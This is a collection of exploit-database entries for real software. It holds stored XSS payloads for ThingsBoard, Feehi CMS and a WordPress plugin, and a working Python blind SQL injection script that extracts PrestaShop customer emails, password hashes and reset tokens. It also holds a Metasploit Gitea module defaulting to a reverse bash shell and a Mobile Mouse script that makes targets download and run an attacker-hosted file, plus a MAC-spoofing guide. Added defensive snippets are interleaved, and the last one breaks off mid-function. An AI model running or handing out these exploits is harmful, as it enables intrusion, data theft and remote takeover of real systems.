
# Exploit Title:  ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)
# Date: 03/08/2022
# Exploit Author: Steffen Langenfeld & Sebastian Biehler
# Vendor Homepage: https://thingsboard.io/
# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
# Version: 3.3.1
# CVE : CVE-2021-42750
# Tested on: Linux

#Proof-Of-Concept:
When creating a rule node (any) and putting a script payload inside the name of the rule node, it is executed upon hovering above the node within the editor.

#Steps

1. Create a new rule node (via the menu "Rule chains")
2. Put a javascript payload within the name, e.g. <script>alert('XSS')</script>
3. Save the node
4. Upon hovering above the node within the editor the payload is executed
            
# Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)
# Date: 02-08-2022
# Exploit Author: Shivam Singh
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
#Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-34140


# Proof of Concept:
1. Sign up at https://localhost.cms.feehi/
2. Inject the XSS payload in the Username field:
   "><script>alert(document.cookie)</script>
   fill in all other required fields and click the SignUp button.
3. Log in to your account and open any article page; the XSS triggers there.
            
# Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi
# Date: 29/07/22
# Exploit Author: Karthik UJ (@5up3r541y4n)
# Vendor Homepage: https://www.prestashop.com/en
# Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0
# Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/
# Version (blockwishlist): 2.1.0
# Version (prestashop): 1.7.8.1
# Tested on: Linux
# CVE: CVE-2022-31101


# This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop

import requests

url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1
cookie = input("Enter cookie value:\n")

header = {
    "Cookie": cookie
}

# Define static stuff
param = "&order="
staticStart = "p.name, (select case when ("
staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc"
charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~'
charset = list(charset)
emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.'
emailCharset = list(emailCharset)


# Query current database name length
print("\nFinding db name's length:")
dbLength = 0  # stays 0 (nothing to enumerate) if no length in range triggers the delay
for length in range(1, 65):
    condition = "LENGTH(database())=" + str(length)
    fullUrl = url + param + staticStart + condition + staticEnd

    try:
        req = requests.get(fullUrl, headers=header, timeout=8)
    except requests.exceptions.Timeout:
        dbLength=length
        print("Length: ", length, end='')
        print("\n")
        break

print("Enumerating current database name:")
databaseName = ''
for i in range(1, dbLength+1):
    for char in charset:
        condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')"
        fullUrl = url + param + staticStart + condition + staticEnd

        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            print(char, end='')
            databaseName += char
            break
print()

# Enumerate any table
prefix = "ps_"
tableName = prefix + "customer"
staticStart = "p.name, (select case when ("
staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer="
staticEnd2 = "); -- .asc"

print("\nEnumerating " + tableName + " table")

for id in range(1, 10):

    condition = "id_customer=" + str(id)
    fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

    try:
        req = requests.get(fullUrl, headers=header, timeout=8)
        print("\nOnly " + str(id - 1) + " records found. Exiting...")
        break
    except requests.exceptions.Timeout:
        pass

    print("\nid = " + str(id))

    # Finding firstname length
    firstnameLength = 0  # default if no length in range triggers the delay
    for length in range(0, 100):
        condition = "LENGTH(firstname)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            firstnameLength=length
            print("Firstname length: ", length, end='')
            print()
            break
        
    
    # Enumerate firstname
    firstname = ''
    print("Firstname: ", end='')
    for i in range(1, firstnameLength+1):  # use the length found above, not the loop counter
        for char in charset:
            condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
            except requests.exceptions.Timeout:
                print(char, end='')
                firstname += char
                break
    print()

    # Finding lastname length
    lastnameLength = 0  # default if no length in range triggers the delay
    for length in range(1, 100):
        condition = "LENGTH(lastname)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            lastnameLength=length
            print("Lastname length: ", length, end='')
            print()
            break
    
    # Enumerate lastname
    lastname = ''
    print("Lastname: ", end='')
    for i in range(1, lastnameLength+1):  # use the length found above, not the loop counter
        for char in charset:
            condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
            except requests.exceptions.Timeout:
                print(char, end='')
                lastname += char  # was appending to firstname by mistake
                break
    print()

    # Finding email length
    emailLength = 0  # default if no length in range triggers the delay
    for length in range(1, 320):
        condition = "LENGTH(email)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            emailLength=length
            print("Email length: ", length, end='')
            print()
            break    

    # Enumerate email
    email = ''
    print("Email: ", end='')
    for i in range(1, emailLength+1):  # use the length found above, not the loop counter
        for char in emailCharset:
            condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    email += char
            except requests.exceptions.Timeout:
                print(char, end='')
                email += char
                break
    print()

    # Finding password hash length
    passwordHashLength = 0  # default if no length in range triggers the delay
    for length in range(1, 500):
        condition = "LENGTH(passwd)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            passwordHashLength=length
            print("Password hash length: ", length, end='')
            print()
            break    

    # Enumerate password hash
    passwordHash = ''
    print("Password hash: ", end='')
    for i in range(1, passwordHashLength+1):  # use the length found above, not the loop counter
        for char in emailCharset:
            condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    passwordHash += char
            except requests.exceptions.Timeout:
                print(char, end='')
                passwordHash += char
                break
    print()

    # Finding password reset token length
    passwordResetTokenLength = 0  # default if no length in range triggers the delay
    for length in range(0, 500):
        condition = "LENGTH(reset_password_token)=" + str(length)
        fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2
        
        try:
            req = requests.get(fullUrl, headers=header, timeout=8)
        except requests.exceptions.Timeout:
            passwordResetTokenLength=length
            print("Password reset token length: ", length, end='')
            print()
            break    

    # Enumerate password reset token
    passwordResetToken = ''
    print("Password reset token: ", end='')
    for i in range(1, passwordResetTokenLength+1):  # use the length found above, not the loop counter
        for char in emailCharset:
            condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'"
            fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2

            try:
                req = requests.get(fullUrl, headers=header, timeout=8)
                if req.status_code == 500 and char == '.':
                    print(char, end='')
                    passwordResetToken += char
            except requests.exceptions.Timeout:
                print(char, end='')
                passwordResetToken += char
                break
    print()
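The script above leaks one bit per request through a SLEEP(7) delay in the `order` parameter, which leaves two server-side traces: SQL syntax in the query string and a burst of requests to one endpoint whose service time sits just above the sleep value. The following is an added example, not part of the advisory, that scans access-log lines for both signals. It assumes an nginx-style combined log with `$request_time` appended as the last field; the sample lines are constructed for this example.

```python
"""Detect time-based blind SQL injection attempts in web access logs."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample: nginx 'combined' format plus "$request_time" as the last field.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jul/2022:10:00:01 +0000] "GET /module/blockwishlist/view?id_wishlist=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 0.043
10.0.0.9 - - [29/Jul/2022:10:00:02 +0000] "GET /module/blockwishlist/view?id_wishlist=1&order=p.name,%20(select%20case%20when%20(LENGTH(database())=1)%20then%20(SELECT%20SLEEP(7))%20else%201%20end);%20--%20.asc HTTP/1.1" 200 5120 "-" "python-requests/2.28" 7.012
10.0.0.9 - - [29/Jul/2022:10:00:10 +0000] "GET /module/blockwishlist/view?id_wishlist=1&order=p.name,%20(select%20case%20when%20(LENGTH(database())=2)%20then%20(SELECT%20SLEEP(7))%20else%201%20end);%20--%20.asc HTTP/1.1" 200 5120 "-" "python-requests/2.28" 0.051
10.0.0.9 - - [29/Jul/2022:10:00:11 +0000] "GET /module/blockwishlist/view?id_wishlist=1&order=p.name.asc HTTP/1.1" 200 5120 "-" "python-requests/2.28" 0.049
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<rt>\d+\.\d+)$'
)

# SQL constructs that have no business in a sort parameter. The "(" after the
# keyword keeps ordinary words such as "select" in a product name from matching.
SQLI_MARKERS = re.compile(r"\b(sleep|benchmark|select|case\s+when|substring|length)\s*\(", re.I)


def parse_line(line):
    """Return a dict of the log fields, with the path URL-decoded, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    rec["path"] = unquote_plus(rec["path"])
    return rec


def find_sqli_markers(path):
    """Return the distinct SQL keywords found in a decoded request path, lower-cased."""
    return sorted({re.sub(r"\s+", " ", k.lower()) for k in SQLI_MARKERS.findall(path)})


def scan(log_text, sleep_seconds=7.0):
    """Flag requests that carry SQL syntax and/or took at least `sleep_seconds`.

    A time-based blind attack answers "true" with a slow response, so the slow
    requests alone reveal which guesses succeeded even if the payload were
    obfuscated past the keyword check. Returns (findings, requests_per_ip).
    """
    findings = []
    per_ip = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        markers = find_sqli_markers(rec["path"])
        slow = rec["rt"] >= sleep_seconds
        if markers or slow:
            per_ip[rec["ip"]] += 1
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "markers": markers,
                             "slow": slow, "rt": rec["rt"]})
    return findings, dict(per_ip)


if __name__ == "__main__":
    hits, counts = scan(SAMPLE_LOG)
    for h in hits:
        print(h)
    print("suspicious requests per client:", counts)
```

A WAF rule on the keywords alone is easy to evade; the per-client count of slow responses to one URL is the more durable signal and pairs well with a rate limit on that endpoint.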
            
# Exploit Title: ThingsBoard 3.3.1 'description' - Stored Cross-Site Scripting (XSS)
# Date: 03/08/2022
# Exploit Author: Steffen Langenfeld & Sebastian Biehler
# Vendor Homepage: https://thingsboard.io/
# Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1
# Version: 3.3.1
# Tested on: [relevant os]
# CVE : CVE-2021-42751
# Tested on: Linux

#Proof-Of-Concept:
When creating a rule node (any) and putting a script payload inside the description of the rule node, it is executed upon hovering above the node within the editor.

#Steps

1. Create a new rule node (via the menu "Rule chains")
2. Put a javascript payload within the description, e.g. <script>alert('XSS')</script>
3. Save the node
4. Upon hovering above the node within the editor the payload is executed
            
# Exploit Title: WordPress Plugin Testimonial Slider and Showcase 2.2.6 - Stored Cross-Site Scripting (XSS)
# Date: 05/08/2022
# Exploit Author: saitamang , yunaranyancat , syad
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/
# Version: 2.2.6
# Tested on: Centos 7 apache2 + MySQL

WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected.

Login as Editor > Add testimonial > Under Title inject payload below (post_title parameter) > Save Draft > Preview the post

payload --> test"/><img/src=""/onerror=alert(document.cookie)>

The draft post can be viewed using the Editor account or Admin account and XSS will be triggered once clicked.

Title: MAC address spoofing in Windows 10 and Linux

In this article you will learn how to change a MAC address manually in Windows and in Linux (Ubuntu and Kali Linux), and how to do it with the macchanger tool.
I have written an article about MAC addresses before, so everyone has a basic understanding of what a MAC is. Can a MAC address be changed?
The answer is no. The MAC address is written into the hardware by the manufacturer and cannot be changed, but we can have software present a different MAC address to the network, which achieves the same deception.
A MAC address is a unique identifier for computers around the world; every device in a network, local or public, is identified by its physical address. When data is transmitted over the network, the frames carry the MAC addresses of both the destination device and the source device.

Why change the MAC address?
Sometimes, while using the Internet, a device gets blocked on the router by its MAC address and can no longer get online. In that situation you need to change the MAC address.

Changing the MAC address in Windows 10
1. Open cmd and run ipconfig /all to view the machine's current MAC address.
2. Select the network adapter, right-click it, and then click Properties.
3. Click Configure - Advanced - Network Address - Value, and modify the value there.

Performing the MAC spoof on Linux
In Kali we use macchanger to do the spoofing.
If you are on another Debian- or Ubuntu-based distribution, you can install it directly with apt-get install macchanger.
Show the current MAC address of your network card with:
macchanger -s eth0
Then spoof the MAC address of your local network card with:
macchanger -m AA:AA:AA:AA:AA:AA eth0
With that, the MAC address spoofing is complete. It's that simple!
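The first octet of a MAC address carries two flag bits: bit 0 is the individual/group (unicast/multicast) bit and bit 1 is the universal/local bit. Addresses burned in by a vendor are universally administered (bit 1 clear) and start with a registered OUI; an address typed in by hand, such as AA:AA:AA:AA:AA:AA above, usually has bit 1 set. That bit is one cheap signal a network owner can check when an unfamiliar address shows up in a lease table. The following is an added example, not part of the article; `describe_mac` and `audit_leases` are hypothetical helpers and the lease table is constructed.

```python
"""Parse MAC addresses and flag locally administered (software-set) ones."""
import re


def normalize_mac(mac):
    """Accept aa:bb:cc:dd:ee:ff, aa-bb-cc-dd-ee-ff or aabbccddeeff; return lowercase colon form."""
    parts = re.split(r"[:-]", mac.strip())
    if len(parts) == 1 and len(parts[0]) == 12:
        parts = [parts[0][i:i + 2] for i in range(0, 12, 2)]
    if len(parts) != 6 or not all(re.fullmatch(r"[0-9A-Fa-f]{2}", p) for p in parts):
        raise ValueError("not a MAC address: %r" % mac)
    return ":".join(p.lower() for p in parts)


def is_mac(mac):
    """True when the string is a well-formed 48-bit MAC address."""
    try:
        normalize_mac(mac)
        return True
    except ValueError:
        return False


def describe_mac(mac):
    """Decode the two flag bits of the first octet and extract the OUI."""
    norm = normalize_mac(mac)
    first = int(norm[:2], 16)
    return {
        "mac": norm,
        "multicast": bool(first & 0x01),            # I/G bit
        "locally_administered": bool(first & 0x02),  # U/L bit
        "oui": norm[:8],
    }


# Constructed DHCP lease table: (ip, mac, hostname)
LEASES = [
    ("192.168.1.10", "3c:22:fb:11:22:33", "printer"),
    ("192.168.1.23", "AA:AA:AA:AA:AA:AA", "kali"),
    ("192.168.1.24", "02-1a-2b-3c-4d-5e", "laptop"),
]


def audit_leases(leases):
    """Return (ip, hostname, mac) for every lease whose address is locally administered.

    This is a signal to correlate with an asset inventory, not proof of spoofing:
    virtual machines and phones with MAC randomization also use locally
    administered addresses.
    """
    flagged = []
    for ip, mac, host in leases:
        info = describe_mac(mac)
        if info["locally_administered"]:
            flagged.append((ip, host, info["mac"]))
    return flagged


if __name__ == "__main__":
    for entry in audit_leases(LEASES):
        print("locally administered address:", entry)
```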

Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)

# Exploit Title: Gitea Git Fetch Remote Code Execution
# Date: 09/14/2022
# Exploit Author: samguy
# Vendor Homepage: https://gitea.io
# Software Link: https://dl.gitea.io/gitea/1.16.6
# Version: <= 1.16.6
# Tested on: Linux - Debian
# Ref : https://tttang.com/archive/1607/
# CVE : CVE-2022-30781

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Gitea Git Fetch Remote Code Execution',
        'Description' => %q{
          This module exploits Git fetch command in Gitea repository migration
          process that leads to a remote command execution on the system.
          This vulnerability affect Gitea before 1.16.7 version.
        },
        'Author' => [
          'wuhan005 & li4n0', # Original PoC
          'krastanoel' # MSF Module
        ],
        'References' => [
          ['CVE', '2022-30781'],
          ['URL', 'https://tttang.com/archive/1607/']
        ],
        'DisclosureDate' => '2022-05-16',
        'License' => MSF_LICENSE,
        'Platform' => %w[unix win],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
            }
          ],
        ],
        'DefaultOptions' => { 'WfsDelay' => 30 },
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )

    register_options([
      Opt::RPORT(3000),
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('USERNAME', [true, 'Username to authenticate with']),
      OptString.new('PASSWORD', [true, 'Password to use']),
      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait', 12])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/user/login'),
      'keep_cookies' => true
    )
    return CheckCode::Unknown('No response from the web service') if res.nil?
    return CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200

    # Powered by Gitea Version: 1.16.6
    unless (match = res.body.match(/Gitea Version: (?<version>[\da-zA-Z.]+)/))
      return CheckCode::Unknown('Target does not appear to be running Gitea.')
    end

    if match[:version].match(/[a-zA-Z]/)
      return CheckCode::Unknown("Unknown Gitea version #{match[:version]}.")
    end

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/user/login'),
      'vars_post' => {
        'user_name' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        '_csrf' => get_csrf(res.get_cookies)
      },
      'keep_cookies' => true
    )
    return CheckCode::Safe('Authentication failed') if res&.code != 302

    if Rex::Version.new(match[:version]) <= Rex::Version.new('1.16.6')
      return CheckCode::Appears("Version detected: #{match[:version]}")
    end

    CheckCode::Safe("Version detected: #{match[:version]}")
  rescue ::Rex::ConnectionError
    return CheckCode::Unknown('Could not connect to the web service')
  end

  def primer
    [
      '/api/v1/version',
      '/api/v1/settings/api',
      "/api/v1/repos/#{@migrate_repo_path}",
      "/api/v1/repos/#{@migrate_repo_path}/pulls",
      "/api/v1/repos/#{@migrate_repo_path}/topics"
    ].each { |uri| hardcoded_uripath(uri) } # adding resources

    vprint_status("Creating repository \"#{@repo_name}\"")
    gitea_create_repo
    vprint_good('Repository created')
    vprint_status("Migrating repository")
    gitea_migrate_repo
  end

  def exploit
    @repo_name = rand_text_alphanumeric(6..15)
    @migrate_repo_name = rand_text_alphanumeric(6..15)
    @migrate_repo_path = "#{datastore['username']}/#{@migrate_repo_name}"
    datastore['URIPATH'] = "/#{@migrate_repo_path}"
    Timeout.timeout(datastore['HTTPDELAY']) { super }
  rescue Timeout::Error
    [@repo_name, @migrate_repo_name].map { |name| gitea_remove_repo(name) }
    cleanup # removing all resources
  end

  def get_csrf(cookies)
    csrf = cookies&.split('; ')&.grep(/_csrf=/)&.join&.split('=')&.last
    fail_with(Failure::UnexpectedReply, 'Unable to get CSRF token') unless csrf
    csrf
  end

  def gitea_remove_repo(name)
    vprint_status("Cleanup: removing repository \"#{name}\"")
    uri = "/#{datastore['username']}/#{name}/settings"
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, uri),
      'keep_cookies' => true
    )
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'action' => 'delete',
        'repo_name' => name,
        '_csrf' => get_csrf(res.get_cookies)
      },
      'keep_cookies' => true
    )
    vprint_warning('Unable to remove repository') if res&.code != 302
  end

  def gitea_create_repo
    uri = normalize_uri(target_uri.path, '/repo/create')
    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => true)
    @uid = res&.get_html_document&.at('//input[@id="uid"]/@value')&.text
    fail_with(Failure::UnexpectedReply, 'Unable to get repo uid') unless @uid

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'uid' => @uid,
        'auto_init' => 'on',
        'readme' => 'Default',
        'repo_name' => @repo_name,
        'trust_model' => 'default',
        'default_branch' => 'master',
        '_csrf' => get_csrf(res.get_cookies)
      },
      'keep_cookies' => true
    )
    fail_with(Failure::UnexpectedReply, 'Unable to create repo') if res&.code != 302
  rescue ::Rex::ConnectionError
    return CheckCode::Unknown('Could not connect to the web service')
  end

  def gitea_migrate_repo
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/repo/migrate'),
      'keep_cookies' => true
    )
    uri = res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text
    fail_with(Failure::UnexpectedReply, 'Unable to get Gitea service type') unless uri

    svc_type = Rack::Utils.parse_query(URI.parse(uri).query)['service_type']
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, uri),
      'keep_cookies' => true
    )
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => uri,
      'vars_post' => {
        'uid' => @uid,
        'service' => svc_type,
        'pull_requests' => 'on',
        'repo_name' => @migrate_repo_name,
        '_csrf' => get_csrf(res.get_cookies),
        'auth_token' => rand_text_alphanumeric(6..15),
        'clone_addr' => "http://#{srvhost_addr}:#{srvport}/#{@migrate_repo_path}",
      },
      'keep_cookies' => true
    )
    if res&.code != 302
      # possibly triggered by the [migrations] settings
      err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text
      gitea_remove_repo(@repo_name)
      cleanup
      fail_with(Failure::UnexpectedReply, "Unable to migrate repo: #{err}")
    end
  rescue ::Rex::ConnectionError
    return CheckCode::Unknown('Could not connect to the web service')
  end

  def on_request_uri(cli, req)
    case req.uri
    when '/api/v1/version'
      send_response(cli, '{"version": "1.16.6"}')
    when '/api/v1/settings/api'
      data = {
        'max_response_items': 50, 'default_paging_num': 30,
        'default_git_trees_per_page': 1000, 'default_max_blob_size': 10485760
      }
      send_response(cli, data.to_json)
    when "/api/v1/repos/#{@migrate_repo_path}"
      data = {
        "clone_url": "#{full_uri}#{datastore['username']}/#{@repo_name}",
        "owner": { "login": datastore['username'] }
      }
      send_response(cli, data.to_json)
    when "/api/v1/repos/#{@migrate_repo_path}/topics?limit=0&page=1"
      send_response(cli, '{"topics":[]}')
    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"
      data = [
        {
          "base": { "ref": "master", },
          "head": {
            "ref": "--upload-pack=#{payload.encoded}",
            "repo": {
              "clone_url": "./",
              "owner": { "login": "master" },
            }
          },
          "updated_at": "2001-01-01T05:00:00+01:00",
          "user": {}
        }
      ]
      send_response(cli, data.to_json)
    end
  end
end
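The module's fake upstream answers the pull-request listing with a head ref of `--upload-pack=<command>`, and the migration hands that string to `git fetch` as though it were a ref name, so git parses it as an option. The general lesson is that any value received from a remote service and placed on a subprocess command line must first be validated as the kind of thing it claims to be. The following is an added example, not Gitea's fix: `is_valid_ref_name` applies a conservative subset of git's ref-name rules (the full set is in `git check-ref-format`), `fetch_argv` refuses anything option-shaped, and the two pull-request records are constructed to mirror the shape the module serves.

```python
"""Reject option-shaped or malformed ref names before they reach git's argv."""
import re

# Characters and sequences git forbids inside a single ref component (subset).
_BAD_COMPONENT = re.compile(r"(^\.|\.lock$|\.\.|@\{|[\x00-\x1f\x7f ~^:?*\[\\])")


def is_valid_ref_name(ref):
    """Conservative subset of git ref-name rules.

    The decisive rule for the bug above: a ref name may never begin with '-',
    because git treats such an argument as an option, not a ref.
    """
    if not ref or ref.startswith("-") or ref.endswith("/") or ref.endswith("."):
        return False
    if "//" in ref or ref == "@":
        return False
    return all(comp and not _BAD_COMPONENT.search(comp) for comp in ref.split("/"))


def fetch_argv(remote_url, head_ref, local_ref):
    """Build argv for fetching a remote head into a local ref.

    Quoting would not help here: no shell is involved, and git itself parses
    arguments that start with '-'. Validation, not escaping, is the control.
    """
    for name in (head_ref, local_ref):
        if not is_valid_ref_name(name):
            raise ValueError("refusing unsafe ref name: %r" % name)
    if not remote_url.startswith(("https://", "http://", "ssh://", "git@")):
        raise ValueError("unsupported or option-shaped remote URL: %r" % remote_url)
    return ["git", "fetch", remote_url, "%s:%s" % (head_ref, local_ref)]


# Constructed pull-request records in the shape the module's fake API returns.
MALICIOUS_PR = {
    "base": {"ref": "master"},
    "head": {"ref": "--upload-pack=id", "repo": {"clone_url": "./"}},
}
BENIGN_PR = {
    "base": {"ref": "master"},
    "head": {"ref": "feature/login-fix", "repo": {"clone_url": "https://example.com/o/r.git"}},
}


def plan_pr_fetch(pr, index):
    """Return the argv for fetching one PR head, or None when the remote's data is rejected."""
    head = pr["head"]["ref"]
    url = pr["head"]["repo"]["clone_url"]
    try:
        return fetch_argv(url, head, "refs/pull/%d/head" % index)
    except ValueError:
        return None


if __name__ == "__main__":
    print("malicious:", plan_pr_fetch(MALICIOUS_PR, 1))
    print("benign:   ", plan_pr_fetch(BENIGN_PR, 2))
```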

Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)

# Exploit Title: Mobile Mouse 3.6.0.4 - Remote Code Execution (RCE)
# Date: Aug 09, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 Enterprise LTSC Build 17763

#!/usr/bin/env python3

import socket
from time import sleep
import argparse

help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File name to Upload")
parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")
args = parser.parse_args()

host = args.target
command_shell = args.file
lhost = args.lhost
port = 9099  # Default Port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# Frames are ASCII fields separated by 0x1E and terminated by 0x04
CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
run = s.recv(54)

RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
run = s.recv(54)
sleep(0.5)

# Backslashes are doubled: the original f-string relied on invalid escape sequences
download_string = f"curl http://{lhost}:8080/{command_shell} -o c:\\Windows\\Temp\\{command_shell}".encode('utf-8')
hex_shell = download_string.hex()
SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04")
s.send(SHELL)
shell = s.recv(96)
print("Executing The Command Shell...")
sleep(1.2)

RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN2)
run2 = s.recv(54)

shell_string = f"c:\\Windows\\Temp\\{command_shell}".encode('utf-8')
hex_run = shell_string.hex()
RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04")
s.send(RUN3)
run3 = s.recv(96)
print(" Take The Rose")
sleep(10)
s.close()
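The hex blobs in the PoC are plain ASCII fields separated by 0x1E (record separator) and terminated by 0x04 (end of transmission). Being able to split a captured TCP stream to port 9099 into those frames is what a network sensor or the server's own logging needs in order to record which peer sent a CONNECT and what text a KEY frame typed. The following decoder is an added example, not part of the exploit; it is inferred only from the constants above and claims nothing about the rest of the protocol. The `SAMPLE` stream is constructed with a harmless string in place of the PoC's command.

```python
"""Split and decode Mobile Mouse frames (fields separated by 0x1E, frames ending in 0x04)."""
RS, EOT = b"\x1e", b"\x04"

# Frames copied from the PoC above.
CONN = bytes.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
RUN = bytes.fromhex("4b45591e3131341e721e4f505404")

# Constructed: the PoC's "KEY 100 <text>" framing with a benign string, followed by its ENTER frame.
TYPE_PREFIX = bytes.fromhex("4B45591E3130301E")
ENTER = bytes.fromhex("4b45591e2d311e454e5445521e04")
SAMPLE = TYPE_PREFIX + b"notepad" + bytes.fromhex("1E04") + ENTER


def split_frames(stream):
    """Return the EOT-terminated frames in a byte stream; an unterminated tail is dropped."""
    return stream.split(EOT)[:-1]


def decode_frame(frame):
    """Split one frame (without its EOT) into its ASCII fields."""
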